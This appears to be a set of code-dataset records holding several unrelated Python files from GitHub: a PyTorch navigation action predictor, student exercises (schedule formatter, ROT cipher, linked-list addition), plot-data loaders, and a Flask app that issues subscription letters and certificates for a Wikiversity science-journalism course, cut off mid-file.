self.lstm = torch.nn.LSTM(input_size=self.input_size//2,\n hidden_size=self.hidden_size//2,\n num_layers=1,\n bias=True,\n batch_first=True,\n bidirectional=True,\n proj_size=0)\n\n def construct_actionseq_predict_logits(self):\n self.action_classify_logits = torch.nn.Linear(\n in_features=self.hidden_size,\n out_features=self.actionclass_num,\n bias=True)\n\n def construct_actionseq_predFC(self):\n self.actionseq_pred_FC0 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC1 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC2 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC3 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC4 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC5 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n\n def construct_backbone_nn(self):\n assert self.backbone_nn_name in ['resnet18', 'resnet50']\n if self.backbone_nn_name == 'resnet18':\n self.embed_backbone = self.obtain_resnet18_pretrained_model()\n elif self.backbone_nn_name == 'resnet50':\n self.embed_backbone = self.obtain_resnet50_pretrained_model()\n else:\n raise ValueError('unknown backbone neural network!')\n\n def obtain_resnet18_pretrained_model(self):\n resnet18_model = models.resnet18(pretrained=True)\n resnet18_model = nn.Sequential(*list(resnet18_model.children())[:-1])\n\n return resnet18_model\n\n def obtain_resnet50_pretrained_model(self):\n resnet50_model = models.resnet50(pretrained=True)\n resnet50_model = nn.Sequential(*list(resnet50_model.children())[:-1])\n\n return resnet50_model\n\n def construct_merge_fc_layer(self):\n self.fc_merger = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size * 2,\n out_features=self.input_size,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size))\n\n\n def forward(self, start_img_input, target_img_input, ):\n '''\n Local motion planner, in each forward process, takes one current observation\n image and one target observation image, as well as the action-sequence leading\n the agent from the current observation to the target observation. Please note\n that the maximum action list length is pre-set as `steplen`, otherwise it is\n padded to `steplen` by concatenating `stop` action. The actions are:\n 0: MoveForward, 1: Turn-Left, 2: Turn-Right, 3: Stop\n :param video_obs_input: [batch, seqlen, channel, height, width]\n :param target_obs: [batch, channel, height, width]\n :param action_input: [batch, steplen], of integers in [0,1,2,3]\n :return: logits\n '''\n start_img_embed = self.embed_backbone( start_img_input )\n target_img_embed = self.embed_backbone( target_img_input )\n\n start_img_embed = torch.squeeze( start_img_embed )\n target_img_embed = torch.squeeze( target_img_embed )\n\n concat_embed_feat = torch.cat(tensors=(start_img_embed,\n target_img_embed),\n dim=-1)\n\n concat_embed_feat = concat_embed_feat.contiguous()\n merged_feat = self.fc_merger(concat_embed_feat)\n\n actseq_fc0 = self.actionseq_pred_FC0(merged_feat)\n actseq_fc1 = self.actionseq_pred_FC1(merged_feat)\n actseq_fc2 = self.actionseq_pred_FC2(merged_feat)\n actseq_fc3 = self.actionseq_pred_FC3(merged_feat)\n actseq_fc4 = self.actionseq_pred_FC4(merged_feat)\n actseq_fc5 = self.actionseq_pred_FC5(merged_feat)\n\n actseq_feat = torch.stack(tensors=(actseq_fc0,\n actseq_fc1,\n actseq_fc2,\n actseq_fc3,\n actseq_fc4,\n actseq_fc5),\n dim=1)\n\n actseq_feat = self.lstm(actseq_feat)[0] #[batchsize, seqlen, 512]\n\n actionseq_pred_logits = self.action_classify_logits(actseq_feat)\n\n\n return actionseq_pred_logits\n\n\nclass ActionAssignerLoss(object):\n def __init__(self):\n self.ce_loss = nn.CrossEntropyLoss()\n def compute_loss(self, action_pred_logits, action_gt ):\n actionclass_num = action_pred_logits.shape[-1]\n # import pdb\n # pdb.set_trace()\n action_pred_logits = torch.reshape(action_pred_logits, shape=[-1, actionclass_num])\n # action_gt = torch.reshape(action_gt, shape=[-1, actionclass_num])\n action_gt = torch.reshape(action_gt, shape=[-1])\n\n loss = self.ce_loss(action_pred_logits, action_gt)\n\n return loss\n","repo_name":"ai4ce/DeepExplorer","sub_path":"models/action_assigner.py","file_name":"action_assigner.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"6865814207","text":"\"\"\"Create schedule from the given file.\"\"\"\nimport re\n\n\ndef read_file(input_file):\n \"\"\"\n Reading from file.\n\n :param input_file:\n \"\"\"\n with open(input_file, \"r\") as file:\n data = file.read()\n return data\n\n\ndef get_schedule_dict(input_string):\n \"\"\"\n Creating dict.\n\n :param input_string:\n \"\"\"\n schedule_dict = {}\n regex = r\" ([0-9]+)\\D([0-9]+)\\ +([a-zA-Z]+)\"\n for match in re.finditer(regex, input_string):\n h = match.group(1)\n m = match.group(2)\n w = match.group(3).lower()\n if len(h) <= 2 and len(m) <= 2:\n if 0 <= int(h) < 24 and 0 <= int(m) <= 59:\n t = f\"{int(h):02}:{int(m):02}\"\n if t in schedule_dict:\n value_list = []\n for i in schedule_dict[t]:\n value_list.append(i)\n if w not in value_list:\n value_list.append(w)\n schedule_dict[t] = value_list\n else:\n schedule_dict[t] = [w]\n return schedule_dict\n\n\ndef get_am_pm(input_string):\n \"\"\"\n Get am/pm list.\n\n :param input_string:\n \"\"\"\n schedule_dict = get_schedule_dict(input_string)\n sorted_dict = {}\n for i in sorted(schedule_dict):\n sorted_dict[i] = schedule_dict[i]\n ampm_dict = {}\n for i in sorted_dict:\n hour = i.split(\":\", )[0]\n hour = int(hour)\n time_list = i.split(\":\")\n words = schedule_dict[i]\n if 0 <= hour < 12:\n if hour == 0:\n time_list[0] = \"12\"\n else:\n time_list[0] = \"%02d\" % hour\n t = time_list[0] + \":\" + time_list[1] + \" AM\"\n ampm_dict[t.lstrip(\"0\")] = words\n else:\n if hour == 12:\n time_list[0] = \"12\"\n else:\n time_list[0] = \"%02d\" % (hour - 12)\n t = time_list[0] + \":\" + time_list[1] + \" PM\"\n ampm_dict[t.lstrip(\"0\")] = words\n return ampm_dict\n\n\ndef get_table_space(key_value, number):\n \"\"\"\n Calculate max len number from a list of dict key and value lengths.\n\n :param key_value:\n :param number:\n \"\"\"\n length = [number]\n for i in key_value:\n if type(i) == str:\n length.append(len(i))\n else:\n if len(i) > 1:\n length.append(len(', '.join(i)))\n else:\n length.append(len(i[0]))\n return max(length) + 2\n\n\ndef create_schedule_string(input_string: str) -> str:\n \"\"\"Create schedule string from the given input string.\"\"\"\n ampm_dict = get_am_pm(input_string)\n if len(ampm_dict) == 0:\n return \"------------------\\n| time | items |\\n------------------\\n| No items found |\\n------------------\"\n w1 = get_table_space(ampm_dict.keys(), 4)\n w2 = get_table_space(ampm_dict.values(), 5)\n line = \"-\" * (w1 + w2 + 3)\n header = f\"|\" + ((w1 - 5) * \" \") + \"time | items\" + ((w2 - 6) * \" \") + \"|\"\n row = \"\"\n for i in ampm_dict:\n n = \"\\n\"\n value = \", \".join(ampm_dict[i])\n value_len = len(value)\n row += \"|\" + (w1 - (len(i) + 1)) * \" \" + i + \" | \" + value + (w2 - value_len - 1) * \" \" + \"|\" + n\n row = row.rstrip(\"\\n\")\n table_list = [line, header, line, row, line]\n table_string = \"\\n\".join(table_list)\n return table_string\n\n\ndef create_schedule_file(input_filename: str, output_filename: str) -> None:\n \"\"\"Create schedule file from the given input file.\"\"\"\n with open(input_filename, \"r\") as f:\n read = f.read()\n result = create_schedule_string(read)\n output_file = open(output_filename, \"w\")\n output_file.write(result)\n\n\nif __name__ == '__main__':\n create_schedule_file(\"schedule_input.txt\", \"schedule_output.txt\")\n","repo_name":"saartanel/iti0102-2019","sub_path":"ex06_schedule/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4498570984","text":"def load_runs(fp: str):\n runs = []\n with open(fp, 'r') as file:\n for line in file.readlines():\n runs.append(float(line))\n\n return runs\n\ndef load_convergence(fp: str, max_itens: int = 100006):\n\n iters = []\n temps = []\n dists = []\n with open(fp, \"r\") as txt_file:\n iter = 1\n for line in txt_file.readlines():\n raw = line.split(\" \")\n temp = raw[0]\n dist = raw[1]\n\n iters.append(int(iter))\n temps.append(float(temp))\n dists.append(float(dist))\n\n iter += 1\n \n return iters[:max_itens], temps[:max_itens], dists[:max_itens]","repo_name":"bkpedrosuper/simulated-annealing","sub_path":"data_plot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74374890010","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n l1numb = self.convertNumb(self.lstNodeToArr(l1, []))\n \n l2numb = self.convertNumb(self.lstNodeToArr(l2, []))\n \n return self.arrToListNode([int(i) for i in str(l1numb + l2numb)])\n \n def lstNodeToArr(self, lstNode, finlst):\n if lstNode.next:\n finlst.append(lstNode.val)\n return self.lstNodeToArr(lstNode.next, finlst)\n else:\n finlst.append(lstNode.val)\n finlst.reverse()\n return finlst\n \n def convertNumb(self, lst):\n strings = [str(integer) for integer in lst]\n a_string = \"\". join(strings)\n return int(a_string)\n \n def arrToListNode(self, numbs):\n nodeList = None\n for x in numbs:\n nodeList = ListNode(x, next=nodeList)\n return nodeList","repo_name":"taylor-ortiz/codingChallenges","sub_path":"AddTwoNumbers/addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"14788754419","text":"import argparse\ndef encrypt(text, rot_val):\n enc_wrd = ''\n text = str(text)\n for i in range(len(text)):\n char = text[i]\n if (char.isupper()):\n enc_wrd = enc_wrd + str(chr((ord(char) + int(rot_val)-65) % 26 + 65))\n elif char == \" \":\n enc_wrd = enc_wrd + \" \"\n elif (char.islower()):\n enc_wrd = enc_wrd + str(chr((ord(char) + int(rot_val)-97) % 26 + 97))\n else:\n enc_wrd = enc_wrd + char\n return enc_wrd\n\ndef decrypt(text, rot_val):\n dec_wrd = ''\n for i in range(len(text)):\n char = text[i]\n if (char.isupper()):\n dec_wrd = dec_wrd + chr((int(ord(char)) - int(rot_val)-65) % 26 + 65)\n elif char == \" \":\n dec_wrd = dec_wrd + \" \"\n elif (char.islower()):\n dec_wrd = dec_wrd + chr((int(ord(char)) - int(rot_val)-97) % 26 + 97)\n else:\n dec_wrd = dec_wrd + char\n return dec_wrd\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--encrypt', help=\"True/False\")\n parser.add_argument(\"-d\", \"--decrypt\", help=\"True/False\")\n args = parser.parse_args()\n \n if args.encrypt:\n plaintext = input(\"Plain text to encrypt: \")\n rot_val = input(\"ROT Value: \")\n encrypted_wrd = encrypt(plaintext, rot_val)\n print(\"Encrypted message: \" + encrypted_wrd)\n if args.decrypt:\n rot_val = input(\"ROT Value: \")\n encrypted_wrd = input(\"Encrypted text to decrypt: \")\n if \"all\" in rot_val:\n from detectEnglish import *\n potential_keys = []\n for i in range(1, 25):\n decrypted_wrd = decrypt(encrypted_wrd, i)\n if isEnglish(decrypted_wrd):\n potential_keys.append(i)\n print(\"\\nPotential keys:-\\n\")\n for i in potential_keys:\n print(f\"KEY{i}\")\n print(\"\\nShowing results for all potential keys...\\n\")\n for i in potential_keys:\n decrypted_word = decrypt(encrypted_wrd, i)\n print(f\"KEY{i} Decrypted text: {decrypted_word}\")\n else:\n decrypted_wrd = decrypt(encrypted_wrd, rot_val)\n print(\"Decrypted message: \" + decrypted_wrd) \n","repo_name":"googleboy-byte/cryptography","sub_path":"cryptography/rot_cipher.py","file_name":"rot_cipher.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35772594378","text":"import io\nimport os\nimport csv\nimport yaml\nimport math\nimport locale\nimport hashlib\nimport requests\nimport cryptography\nfrom flask import Flask, render_template, request, redirect, url_for, session, make_response, Response, g\nfrom fpdf import FPDF\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom requests_oauthlib import OAuth1Session\nfrom oauth_wiki import get_username\nfrom sqlalchemy_utils import StringEncryptedType\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\nfrom email.message import EmailMessage\nimport ssl\nimport smtplib\nfrom email.header import Header\nfrom email.utils import formataddr\nfrom email.mime.text import MIMEText\n\n__dir__ = os.path.dirname(__file__)\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'\napp.config['SQLALCHEMY_BINDS'] = {'activities': 'sqlite:///users.db'}\napp.config.update(yaml.safe_load(open(os.path.join(__dir__, 'config.yaml'))))\n\n# Initialize the database\ndb = SQLAlchemy(app)\n\nkey = app.config[\"ENCRYPTION_KEY\"]\n\n\n# Create database (db) model\nclass Users(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(150), nullable=False, unique=True)\n full_name = db.Column(StringEncryptedType(db.String(300), key), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow())\n date_modified = db.Column(db.DateTime, default=datetime.utcnow())\n can_download_certificate = db.Column(db.String(), nullable=False)\n solicited_certificate = db.Column(db.Boolean, nullable=False, default=False)\n\n\nclass SubsPDF(FPDF):\n def header(self):\n self.image(os.path.join(app.static_folder, 'A_los_derechos_humanos_cropped.jpg'), x=0, y=0, w=210, h=32)\n # Box for the title\n self.set_draw_color(0, 104, 163)\n self.set_fill_color(0, 104, 163) # Blue box as background for the title\n self.set_text_color(255, 255, 255) # Title in white color\n self.set_font('Times', 'B', 15) # Title in Times New Roman, bold, 15pt\n # Title text\n self.set_x(30)\n self.cell(w=150, h=12, border=0, ln=1, align='C', fill=True, txt='INTRODUÇÃO AO JORNALISMO CIENTÍFICO')\n\n def footer(self):\n username = get_username()\n user = Users.query.filter_by(username=username).first()\n date_modified = user.date_modified\n user_hash = hashlib.sha1(bytes(\"Subscription \" + username + str(date_modified), 'utf-8')).hexdigest()\n self.set_y(-16.5)\n self.set_font('Times', '', 8.8)\n self.cell(w=0, h=6.5, border=0, ln=1, align='C',\n txt='A validade deste documento pode ser checada em https://ijc.toolforge.org/. '\n 'O código de validação é: ' + user_hash)\n pass\n\n\nclass CertificationPDF(FPDF):\n def header(self):\n self.image(os.path.join(app.static_folder, 'background_certificado.jpg'), x=0, y=0, w=297, h=210)\n\n def footer(self):\n username = get_username()\n user = Users.query.filter_by(username=username).first()\n date_modified = user.date_modified\n user_hash = hashlib.sha1(bytes(\"Certificate \" + username + str(date_modified), 'utf-8')).hexdigest()\n self.set_y(-16.5)\n self.set_font('Merriweather', '', 8.8)\n self.cell(w=0, h=6.5, border=0, ln=1, align='C',\n txt='A validade deste documento pode ser checada em https://ijc.toolforge.org/. '\n 'O código de validação é: ' + user_hash)\n pass\n\n\n########################################################################################################################\n# L O G I N\n########################################################################################################################\n@app.before_request\ndef init_profile():\n g.profiling = []\n\n\n@app.before_request\ndef global_user():\n g.user = get_username()\n\n\n@app.route('/login')\ndef login():\n \"\"\"\n This function creates an OAuth session and sends the user\n to the authorization special webpage in ptwikiversity so\n the user can give permission for the tool to operate.\n\n :return: redirects the user to the authorization special\n webpage on ptwikiversity.\n \"\"\"\n\n next_page = request.args.get('next')\n\n if next_page:\n session['after_login'] = next_page\n\n client_key = app.config['CONSUMER_KEY']\n client_secret = app.config['CONSUMER_SECRET']\n\n base_url = 'https://pt.wikiversity.org/w/index.php'\n request_token_url = base_url + '?title=Special%3aOAuth%2finitiate'\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n callback_uri='oob')\n\n fetch_response = oauth.fetch_request_token(request_token_url)\n\n session['owner_key'] = fetch_response.get('oauth_token')\n session['owner_secret'] = fetch_response.get('oauth_token_secret')\n\n base_authorization_url = 'https://pt.wikiversity.org/wiki/Special:OAuth/authorize'\n authorization_url = oauth.authorization_url(base_authorization_url,\n oauth_consumer_key=client_key)\n\n return redirect(authorization_url)\n\n\n@app.route(\"/oauth-callback\", methods=[\"GET\"])\ndef oauth_callback():\n \"\"\"\n This function stores the authorization tokens of the\n users and redirects them to the page they were before\n the logging in process.\n\n :return: redirects the users to the page they were\n before logging in and authorizating the tool.\n \"\"\"\n\n base_url = 'https://pt.wikiversity.org/w/index.php'\n client_key = app.config['CONSUMER_KEY']\n client_secret = app.config['CONSUMER_SECRET']\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n resource_owner_key=session['owner_key'],\n resource_owner_secret=session['owner_secret'])\n\n oauth_response = oauth.parse_authorization_response(request.url)\n verifier = oauth_response.get('oauth_verifier')\n access_token_url = base_url + '?title=Special%3aOAuth%2ftoken'\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n resource_owner_key=session['owner_key'],\n resource_owner_secret=session['owner_secret'],\n verifier=verifier)\n\n oauth_tokens = oauth.fetch_access_token(access_token_url)\n session['owner_key'] = oauth_tokens.get('oauth_token')\n session['owner_secret'] = oauth_tokens.get('oauth_token_secret')\n next_page = session.get('after_login')\n\n return redirect(next_page)\n\n\n########################################################################################################################\n# P A G E S\n########################################################################################################################\n# Sobre\n@app.route('/about')\ndef about():\n \"\"\"\n This function shows a page describing the Introdução ao Jornalismo Científico course and tool\n\n :return: A html page with the about content.\n \"\"\"\n\n username = get_username()\n return render_template('about.html',\n username=username)\n\n\n# Página inicial\n@app.route('/')\ndef home():\n \"\"\"\n This function shows the homepage for the Introdução ao Jornalismo Científico tool\n\n :return: A html page with the initial content.\n \"\"\"\n\n username = get_username()\n return render_template('home.html',\n username=username)\n\n\n# Inscrição\n@app.route('/subscription', methods=['POST', 'GET'])\ndef subscription():\n \"\"\"\n This page shows a webpage with the letter of subscription\n\n :return: A html page with a form for subscription\n \"\"\"\n\n username = get_username()\n\n if username:\n if request.method == 'POST':\n user_name = request.form['Username']\n full_name = request.form['FullName']\n modules_activities = [\"NP\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]\n\n new_subscription = Users(username=user_name,\n full_name=full_name,\n can_download_certificate=\";\".join(modules_activities))\n\n # Try to push it to the database\n try:\n db.session.add(new_subscription)\n db.session.commit()\n return redirect(url_for('subscription'))\n except:\n return 'Ocorreu um erro!'\n else:\n user_is_registered = Users.query.filter_by(username=username).first()\n return render_template('subscription.html',\n username=username,\n user_is_registered=user_is_registered)\n else:\n return redirect(url_for('home'))\n\n\n# Atualizar inscrição\n@app.route('/update_subscription/', methods=['POST', 'GET'])\ndef update_subscription(user_username):\n \"\"\"\n This function shows a page for the coordinator update users full name\n\n :return: A html page with a form for updating the user subscription\n \"\"\"\n\n username = get_username()\n if username in app.config['COORDINATORS_USERNAMES']:\n user_to_update = Users.query.filter_by(username=user_username).first()\n\n if request.method == 'POST':\n user_to_update.full_name = request.form[\"FullName\"]\n user_to_update.date_modified = datetime.utcnow()\n\n modules_activities = [\"F\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]\n user_to_update.can_download_certificate = \";\".join(modules_activities)\n\n # Try to push it to the database\n try:\n db.session.commit()\n return redirect(url_for('subscription'))\n except:\n return 'Ocorreu um erro!'\n else:\n return render_template('update_subscription.html',\n username=username,\n user=user_to_update)\n else:\n return redirect(url_for('home'))\n\n\n# Gerar carta de inscrição\n@app.route('/subscription_letter', methods=['GET'])\ndef subscription_letter():\n \"\"\"\n This function generates a pdf file with a letter of subscription in the course\n\n :return: A pdf file with a letter of subscription\n \"\"\"\n\n username = get_username()\n\n if username:\n # Create page\n pdf = SubsPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n\n #######################################################################################################\n # Data\n #######################################################################################################\n pdf.set_xy(10, 42) # Start the letter text at the 10x42mm point\n\n pdf.set_font('Times', '', 13) # Text of the body in Times New Roman, regular, 13 pt\n\n locale.setlocale(locale.LC_TIME, \"pt_BR\") # Setting the language to portuguese for the date\n pdf.cell(w=150, h=6.5, border=0, ln=1, align='L',\n txt='São Paulo, ' + datetime.now().strftime(\"%d de %B de %Y\"))\n\n pdf.cell(w=0, h=6.5, ln=1) # New line\n\n #######################################################################################################\n # A quem possa interessar\n #######################################################################################################\n pdf.set_font('Times', 'B', 13) # Text of the addressing in Times New Roman, bold, 13 pt\n pdf.cell(w=150, h=6.5, txt='A quem possa interessar', border=0, ln=1, align='L')\n\n pdf.cell(w=0, h=6.5, ln=1) # New line\n\n #######################################################################################################\n # User data\n #######################################################################################################\n user = Users.query.filter_by(username=username).first()\n\n name = user.full_name # User full name\n\n #######################################################################################################\n # Text\n #######################################################################################################\n pdf.set_font('Times', '', 13) # Text of the body in Times New Roman, regular, 13 pt\n pdf.multi_cell(w=0,\n h=6.5,\n txt=\"O curso de Introdução ao Jornalismo Científico, desenvolvido pelo Centro de Pesquisa, Inovação \"\n \"e Difusão em Neuromatemática com o apoio da FAPESP e do Wiki Movimento Brasil, está disponível \"\n \"em uma plataforma de educação aberta, a Wikiversidade.\\n\\n\"\n \"As aulas foram realizadas, com orientação científica da equipe de pesquisa do CEPID NeuroMat, \"\n \"por bolsistas de jornalismo científico da FAPESP. O objetivo do curso é capacitar profissio\"\n \"nais de comunicação na cobertura jornalística especializada em ciência. Está também direciona\"\n \"do ao atendimento ao exposto no edital Mídia Ciência, da FAPESP.\\n\\n\"\n \"O curso é livre e o controle das atividades é realizado por recursos na Wikimedia. \"\n \"Esta carta certifica que \"\n + name +\n \" está apto(a) a participar do curso de Introdução ao \"\n \"Jornalismo Científico.\\n\\n\"\n \"Caso requisitado, podemos emitir uma declaração de conclusão do curso, uma vez que o(a) \"\n \"participante tenha finalizado todas as leituras e tarefas.\\n\\n\"\n \"Por favor, não hesitem em entrar em contato conosco para receber outras informações a respeito \"\n \"do curso.\\n\\n\"\n \"Atenciosamente,\",\n border=0,\n align='J')\n\n #######################################################################################################\n # Footer\n #######################################################################################################\n pdf.cell(w=0, h=13, ln=1) # Give some space for the signatures\n # Fernando da Paixão signature\n pdf.image(os.path.join(app.static_folder, 'fpaixao.png'), x=37.5, y=224, w=35, h=16)\n pdf.set_y(230)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"_____________________________________\\n\"\n \"FERNANDO JORGE DA\\nPAIXÃO FILHO\\n\\nCoordenador da equipe de\\ndifusão do CEPID NeuroMat\",\n border=0,\n align='C')\n\n # João Alexandre Peschanski signature\n pdf.image(os.path.join(app.static_folder, 'jap.png'), x=137.5, y=226, w=35, h=16)\n pdf.set_xy(110, 230)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"_____________________________________\\n\"\n \"JOÃO ALEXANDRE\\nPESCHANSKI\\n\\nPesquisador associado\\ndo CEPID NeuroMat\",\n border=0,\n align='C')\n pdf.cell(w=0, h=5, ln=1)\n\n # Generate the file\n file = pdf.output(dest='S').encode('latin-1')\n\n response = make_response(file)\n response.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Inscrição_' + name.replace(\" \", \"_\") + '.pdf')\n response.headers.set('Content-Type', 'application/pdf')\n return response\n else:\n return redirect(url_for('home'))\n\n\n# Validar documentos\n@app.route('/validate', methods=['POST', 'GET'])\ndef validate_document():\n \"\"\"\n This function verifies the validation of documents of the course\n\n :return: A message validating or denying a hash of a document\n \"\"\"\n username = get_username()\n\n if request.method == 'POST':\n hash_to_be_checked = request.form[\"hash\"]\n\n if hash_to_be_checked:\n users = Users.query.all()\n hashs_sub = [\n hashlib.sha1(bytes(\"Subscription \" + user.username + str(user.date_modified), 'utf-8')).hexdigest()\n for user in users]\n hashs_certificate = [\n hashlib.sha1(bytes(\"Certificate \" + user.username + str(user.date_modified), 'utf-8')).hexdigest()\n for user in users]\n\n if hash_to_be_checked in hashs_sub or hash_to_be_checked in hashs_certificate:\n message = True\n else:\n message = False\n\n return render_template('validation.html', username=username, message=message, success=True)\n else:\n return render_template('validation.html', username=username)\n else:\n return render_template('validation.html', username=username)\n\n\n# Baixar índice\n@app.route('/index', methods=['GET'])\ndef course_index():\n base_url = \"https://pt.wikiversity.org/api/rest_v1/page/pdf/Programa_de_Introdução_ao_Jornalismo_Científico\"\n\n response = make_response(requests.get(base_url).content)\n response.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Programa.pdf')\n response.headers.set('Content-Type', 'application/pdf')\n return response\n\n\n# Gerar certificado\n@app.route('/generate_certificate', methods=['GET'])\ndef generate_certificate():\n \"\"\"\n This function generates a pdf file with the certificate for the course\n\n :return: A pdf file with the certificate\n \"\"\"\n username = get_username()\n\n user = Users.query.filter_by(username=username).first()\n if username and user:\n if user.can_download_certificate == \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]):\n # Create page\n pdf = CertificationPDF(orientation='L', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_text_color(0, 46, 75)\n\n #######################################################################################################\n # Header\n #######################################################################################################\n pdf.set_y(20) # Start the letter text at the 10x42mm point\n\n pdf.add_font('Merriweather', '', os.path.join(app.static_folder, 'fonts/Merriweather-Regular.ttf'), uni=True)\n pdf.add_font('Merriweather-Bold', '', os.path.join(app.static_folder, 'fonts/Merriweather-Bold.ttf'), uni=True)\n pdf.set_font('Merriweather', '', 37) # Text of the body in Times New Roman, regular, 13 pt\n\n locale.setlocale(locale.LC_TIME, \"pt_BR\") # Setting the language to portuguese for the date\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='CERTIFICADO')\n\n pdf.set_font('Merriweather', '', 14.5)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='Concedemos este certificado a')\n pdf.cell(w=0, h=10, ln=1) # New line\n\n #######################################################################################################\n # User name\n #######################################################################################################\n user = Users.query.filter_by(username=username).first()\n name = user.full_name # User full name\n pdf.set_font('Merriweather', '', 35)\n name_size = pdf.get_string_width(name)\n\n if name_size > 287:\n # Try to eliminate the prepositions\n name_split = [name_part for name_part in name.split(' ') if not name_part.islower()]\n # There's a first and last names and at least one middle name\n if len(name_split) > 2:\n first_name = name_split[0]\n last_name = name_split[-1]\n middle_names = [md_name[0]+'.' for md_name in name_split[1:-1]]\n name = first_name + ' ' + ' '.join(middle_names) + ' ' + last_name\n name_size = pdf.get_string_width(name)\n\n # Even abbreviating, there is still the possibility that the name is too big, so\n # we need to adjust it to the proper size\n if name_size > 287:\n pdf.set_font('Merriweather', '', math.floor(287 * 35 / name_size))\n\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt=name)\n pdf.cell(w=0, h=10, ln=1) # New line\n\n #######################################################################################################\n # por ter completado as leituras e as 6 tarefas do curso online\n #######################################################################################################\n pdf.set_font('Merriweather', '', 14.5)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='por ter completado as leituras e as ' +\n str(app.config[\"NUMBER_OF_MODULES\"]) +\n ' tarefas do curso online')\n\n #######################################################################################################\n # Introdução ao Jornalismo Científico\n #######################################################################################################\n pdf.set_font('Merriweather-Bold', '', 21)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='Introdução ao Jornalismo Científico')\n pdf.cell(w=0, h=8, ln=1) # New line\n\n #######################################################################################################\n # Logo NeuroMat\n #######################################################################################################\n pdf.set_font('Merriweather', '', 12.5)\n pdf.set_x(50)\n y_production = pdf.get_y()\n pdf.cell(w=20, h=10, border=0, ln=0, align='L', txt='Produção:')\n y_logos = pdf.get_y()\n pdf.image(os.path.join(app.static_folder, 'neuromat.png'), x=78, y=y_production+0.6, h=8.5)\n\n #######################################################################################################\n # Logo FAPESP and WMB\n #######################################################################################################\n pdf.set_xy(155, y_production)\n pdf.cell(w=20, h=10, border=0, ln=1, align='L', txt='Apoio:')\n pdf.image(os.path.join(app.static_folder, 'fapesp.png'), x=175, y=y_production+1.1, h=7)\n pdf.image(os.path.join(app.static_folder, 'wmb.png'), x=215, y=y_production-1.1, h=13)\n\n pdf.cell(w=0, h=5, ln=1) # New line\n\n #######################################################################################################\n # Footer\n #######################################################################################################\n y_signature = pdf.get_y() # Register the \"y\" position, so the signatures are aligned\n\n # Fernando da Paixão signature\n pdf.image(os.path.join(app.static_folder, 'fpaixao.png'), x=75, y=y_signature, w=35, h=16)\n pdf.set_xy(50, y_signature+6)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"______________________\\n\"\n \"FERNANDO JORGE DA\\nPAIXÃO FILHO\\n\\nCoordenador da equipe de\\ndifusão do CEPID NeuroMat\",\n border=0,\n align='C')\n\n # João Alexandre Peschanski signature\n pdf.image(os.path.join(app.static_folder, 'jap.png'), x=180, y=y_signature+2, w=35, 